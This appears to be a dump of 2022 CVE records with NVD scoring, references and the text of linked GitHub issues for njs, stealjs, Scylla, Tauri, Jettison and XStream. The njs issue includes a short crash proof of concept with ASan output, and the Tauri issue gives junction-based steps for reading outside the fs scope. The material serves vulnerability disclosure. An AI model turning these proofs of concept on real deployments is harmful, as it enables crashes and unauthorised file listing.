{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/569" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/569" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.7:*:*:*:*:*:*:*", "matchCriteriaId": "B99556AB-3BAC-4553-8CDC-17292CF06AA8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nginx/njs/issues/569
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
the call stack is different with https://github.com/nginx/njs/issues/522 ``` Environment commit: 569292e0a74f2b1ec09566f3329f82bdd0d58e87 version: 0.7.7 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Poc ```js function placeholder(){} function main() { var v2 = String.fromCharCode(-950135168); var v3 = v2.trimEnd(String); var v8 = 512 >>> "multiline"; var v9 = String.fromCharCode(788580.490736339); var v10 = v9.padEnd(v8,v3); var v11 = v10.lastIndexOf(788580.490736339); } main(); ``` Asan ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1550478==ERROR: AddressSanitizer: SEGV on unknown address 0x6170bebedece (pc 0x000000505f0e bp 0x7fff88dc8f70 sp 0x7fff88dc8e40 T0) ==1550478==The signal is caused by a READ memory access. #0 0x505f0e in njs_utf8_next /data/test-njs/njs/src/njs_utf8.h:54:20 #1 0x505f0e in njs_string_offset /data/test-njs/njs/src/njs_string.c:2545:17 #2 0x505f0e in njs_string_prototype_last_index_of /data/test-njs/njs/src/njs_string.c:2309:13 #3 0x53df7c in njs_function_native_call /data/test-njs/njs/src/njs_function.c:742:11 #4 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23 #5 0x53d466 in njs_function_lambda_call /data/test-njs/njs/src/njs_function.c:693:11 #6 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23 #7 0x4df05a in njs_vm_start /data/test-njs/njs/src/njs_vm.c:543:11 #8 0x4c7f89 in njs_process_script /data/test-njs/njs/src/njs_shell.c:919:19 #9 0x4c73b1 in njs_process_file /data/test-njs/njs/src/njs_shell.c:648:11 #10 0x4c73b1 in main /data/test-njs/njs/src/njs_shell.c:314:15 #11 0x7f75066e7082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x41daad in _start (/data/test-njs/njs/build/njs+0x41daad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /data/test-njs/njs/src/njs_utf8.h:54:20 in njs_utf8_next ==1550478==ABORTING ``` Credit ret2ddme
Another way to trigger SEGV in njs_utf8_next cause oob read
https://api.github.com/repos/nginx/njs/issues/569/comments
2
2022-08-25T02:58:03Z
2022-09-02T00:51:09Z
https://github.com/nginx/njs/issues/569
1,350,249,226
569
4,153
CVE-2022-37260
2022-09-15T19:15:09.847
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2490" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3344" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2490" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3344" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1529" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*", "matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/stealjs/steal/issues/1529
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js. The ReDoS vulnerability can be mitigated with several best practices described here: https://snyk.io/blog/redos-and-catastrophic-backtracking/
[CVE-2022-37260]/ReDos found in main.js
https://api.github.com/repos/stealjs/steal/issues/1529/comments
0
2022-09-14T09:25:55Z
2022-09-14T09:25:55Z
https://github.com/stealjs/steal/issues/1529
1,372,653,654
1,529
4,154
CVE-2022-29240
2022-09-15T22:15:11.220
Scylla is a real-time big data database that is API-compatible with Apache Cassandra and Amazon DynamoDB. When decompressing CQL frame received from user, Scylla assumes that user-provided uncompressed length is correct. If user provides fake length, that is greater than the real one, part of decompression buffer won't be overwritten, and will be left uninitialized. This can be exploited in several ways, depending on the privileges of the user. 1. The main exploit is that an attacker with access to CQL port, but no user account, can bypass authentication, but only if there are other legitimate clients making connections to the cluster, and they use LZ4. 2. Attacker that already has a user account on the cluster can read parts of uninitialized memory, which can contain things like passwords of other users or fragments of other queries / results, which leads to authorization bypass and sensitive information disclosure. The bug has been patched in the following versions: Scylla Enterprise: 2020.1.14, 2021.1.12, 2022.1.0. Scylla Open Source: 4.6.7, 5.0.3. Users unable to upgrade should make sure none of their drivers connect to cluster using LZ4 compression, and that Scylla CQL port is behind firewall. Additionally make sure no untrusted client can connect to Scylla, by setting up authentication and applying workarounds from previous point (firewall, no lz4 compression).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/scylladb/scylla/security/advisories/GHSA-25pq-rrqm-6fmr" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/scylladb/scylladb/commit/1c2eef384da439b0457b6d71c7e37d7268e471cb" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/scylladb/scylladb/issues/11476" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/scylladb/scylla/security/advisories/GHSA-25pq-rrqm-6fmr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/scylladb/scylladb/commit/1c2eef384da439b0457b6d71c7e37d7268e471cb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/scylladb/scylladb/issues/11476" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:open_source:*:*:*", "matchCriteriaId": "62049391-A8C3-4963-B692-B9D0EBD24754", "versionEndExcluding": "4.6.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "3D30E6EF-8EDA-467A-B467-0DD00916F5BE", "versionEndExcluding": "2020.1.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:open_source:*:*:*", "matchCriteriaId": "3BD1B169-D009-459A-AA09-60835C7712EA", "versionEndExcluding": "5.0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "25942345-FCBA-4788-B0CA-4E6C247C9862", "versionEndExcluding": "2021.1.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2021.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/scylladb/scylladb/issues/11476
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "scylladb", "scylladb" ]
We return the wrong size, which can lead to crashes or other undefined behavior. This is [CVE-2022-29240](https://github.com/scylladb/scylladb/security/advisories/GHSA-25pq-rrqm-6fmr).
Undefined behavior in transport decompression code
https://api.github.com/repos/scylladb/scylladb/issues/11476/comments
1
2022-09-07T07:57:30Z
2022-11-16T19:23:33Z
https://github.com/scylladb/scylladb/issues/11476
1,364,252,689
11,476
4,155
CVE-2022-39215
2022-09-15T22:15:11.527
Tauri is a framework for building binaries for all major desktop platforms. Due to missing canonicalization when `readDir` is called recursively, it was possible to display directory listings outside of the defined `fs` scope. This required a crafted symbolic link or junction folder inside an allowed path of the `fs` scope. No arbitrary file content could be leaked. The issue has been resolved in version 1.0.6 and the implementation now properly checks if the requested (sub) directory is a symbolic link outside of the defined `scope`. Users are advised to upgrade. Users unable to upgrade should disable the `readDir` endpoint in the `allowlist` inside the `tauri.conf.json`.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/issues/4882" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/pull/5123" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/pull/5123/commits/1f9b9e8d26a2c915390323e161020bcb36d44678" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/security/advisories/GHSA-28m8-9j7v-x499" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/issues/4882" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/pull/5123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/pull/5123/commits/1f9b9e8d26a2c915390323e161020bcb36d44678" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/tauri-apps/tauri/security/advisories/GHSA-28m8-9j7v-x499" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tauri:tauri:*:*:*:*:*:*:*:*", "matchCriteriaId": "BE5A2510-1D82-4D06-BFDC-08FA3942EDC8", "versionEndExcluding": "1.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/tauri-apps/tauri/issues/4882
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tauri-apps", "tauri" ]
### Describe the bug When a junction is created in the $APP Base directory on windows eg. `mklink /J C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder C:\Dev\TestFolder`) The folder is accessible together with all files and folders inside using fs if read from the root directory `const entries = await readDir('', { dir: BaseDirectory.App, recursive: true });` But when trying to read the folder directly using `const entries = await readDir('TestFolder', { dir: BaseDirectory.App, recursive: true });` it fails with an error `Uncaught (in promise) path not allowed on the configured scope: C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder` ### Reproduction 1. Create Junction in $APP directory 2. Try to access that directory recursively with readDir with empty dir parameter 3. Folder and its contents can be read 4. Try to access that directory again with readDir but with the name of the directory as dir parameter ### Expected behavior I would expect to either not be able to access the folder at all, or be able to access it directly as well if it is accessible from root recursively. ### Platform and versions ``` Environment › OS: Windows 10.0.19044 X64 › Webview2: 103.0.1264.77 › MSVC: - Visual Studio Community 2019 - Visual Studio Build Tools 2019 › Node.js: 16.13.1 › npm: 8.1.2 › pnpm: 6.11.0 › yarn: 1.22.15 › rustup: 1.25.1 › rustc: 1.62.1 › cargo: 1.62.1 › Rust toolchain: stable-x86_64-pc-windows-msvc Packages › @tauri-apps/cli [NPM]: 1.0.5 › @tauri-apps/api [NPM]: 1.0.2 › tauri [RUST]: 1.0.5, › tauri-build [RUST]: 1.0.4, › tao [RUST]: 0.12.2, › wry [RUST]: 0.19.0, App › build-type: bundle › CSP: unset › distDir: ../dist › devPath: http://localhost:5173/ › framework: Vue.js App directory structure ├─ .vscode ├─ dist ├─ node_modules ├─ public ├─ src └─ src-tauri ``` ### Stack trace _No response_ ### Additional context _No response_
[bug] Accessing junction folder from within $APP folder on Windows
https://api.github.com/repos/tauri-apps/tauri/issues/4882/comments
0
2022-08-07T18:06:13Z
2022-09-08T13:59:07Z
https://github.com/tauri-apps/tauri/issues/4882
1,331,083,809
4,882
4,156
CVE-2022-40149
2022-09-16T10:15:09.677
Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "cve-coordination@google.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve-coordination@google.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538" }, { "source": "cve-coordination@google.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jettison-json/jettison/issues/45" }, { "source": "cve-coordination@google.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html" }, { "source": "cve-coordination@google.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5312" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jettison-json/jettison/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5312" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jettison_project:jettison:*:*:*:*:*:*:*:*", "matchCriteriaId": "56D361BD-D04F-425F-A8EB-4D389BD32429", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jettison-json/jettison/issues/45
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jettison-json", "jettison" ]
Dear Jettison maintainers, Multiple bugs were found during fuzzing by [Jazzer](https://github.com/CodeIntelligenceTesting/jazzer) in Jettison, for example [[Out of memory](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46549) and [Stackoverflow](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538)]. We would like to provide you with access to the bugs at Google OSS-Fuzz before they get publicly disclosed. What do we need from you? We need an email address that is associated with a Google Account as per [Accepting new projects](https://google.github.io/oss-fuzz/getting-started/accepting-new-projects/). In the past we have already contacted you during the onboarding of your project, but the request was rejected or no email was shared with us. What do you get by sharing your email address? When a bug is found, you will receive an email that will provide you with access to ClusterFuzz, crash reports, code coverage reports and fuzzer statistics. Each finding will have a crashing input that you can use to easily reproduce the bug. Attention: All bug details will be made public automatically after the deadline of 90 days has exceeded or after the fix is released. For projects without maintainers we will do our best to support the disclosure process. Depending on our resources we will try to create an issues for every bug in your public issues tracker. In addition, we will request CVEs for security related vulnerabilities. Please let me know if you have any questions regarding fuzzing or the OSS-Fuzz integration. Thank you for your reading and hope to hear from you soon!
New OSS-Fuzz Findings in Jettison
https://api.github.com/repos/jettison-json/jettison/issues/45/comments
10
2022-08-03T14:40:56Z
2023-01-01T12:41:39Z
https://github.com/jettison-json/jettison/issues/45
1,327,327,641
45
4,157
CVE-2022-40151
2022-09-16T10:15:09.817
Those using Xstream to seralize XML data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "cve-coordination@google.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve-coordination@google.com", "tags": [ "Exploit", "Permissions Required", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47367" }, { "source": "cve-coordination@google.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/x-stream/xstream/issues/304" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Permissions Required", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47367" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/x-stream/xstream/issues/304" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*", "matchCriteriaId": "A6DDFDA0-5B71-4DEF-98C5-216EE4042401", "versionEndExcluding": null, "versionEndIncluding": "1.4.19", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/x-stream/xstream/issues/304
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "x-stream", "xstream" ]
Dear xstream maintainers, Multiple bugs(Stackoverflows) were found during fuzzing by [Jazzer](https://github.com/CodeIntelligenceTesting/jazzer) in xstream. We would like to provide you with access to the bugs at Google OSS-Fuzz before they get publicly disclosed. What do we need from you? We need an email address that is associated with a Google Account as per [Accept new projects](https://google.github.io/oss-fuzz/getting-started/accepting-new-projects/). In the past we have already contacted you during the onboarding of your project, but the request was rejected or no email was shared with us. What do you get by sharing your email address? When a bug is found, you will receive an email that will provide you with access to ClusterFuzz, crash reports, code coverage reports and fuzzer statistics. Each finding will have a crashing input that you can use to easily reproduce the bug. Attention: All bug details will be made public automatically after the deadline of 90 days has exceeded or after the fix is released. For projects without maintainers we will do our best to support the disclosure process. Depending on our resources we will try to create an issues for every bug in your public issues tracker. In addition, we will request CVEs for security related vulnerabilities. Please let me know if you have any questions regarding fuzzing or the OSS-Fuzz integration. Thank you for your reading and hope to hear from you soon!
New OSS-Fuzz Findings in xstream
https://api.github.com/repos/x-stream/xstream/issues/304/comments
45
2022-08-04T12:20:17Z
2022-12-23T22:37:34Z
https://github.com/x-stream/xstream/issues/304
1,328,536,856
304
4,158
CVE-2022-37258
2022-09-16T22:15:12.097
Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the packageName variable in npm-convert.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L369" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1527" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L369" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stealjs/steal/issues/1527" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "F01F1B6C-0486-4C61-A8F0-5ABAC7B0E168", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stealjs/steal/issues/1527
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stealjs", "steal" ]
Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the packageName variable in npm-convert.js. The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
[CVE-2022-37258]/Prototype pollution found in npm-convert.js
https://api.github.com/repos/stealjs/steal/issues/1527/comments
0
2022-09-14T09:17:00Z
2022-09-14T09:17:00Z
https://github.com/stealjs/steal/issues/1527
1,372,641,337
1,527
4,159
CVE-2022-40755
2022-09-16T22:15:12.303
JasPer 3.0.6 allows denial of service via a reachable assertion in the function inttobits in libjasper/base/jas_image.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
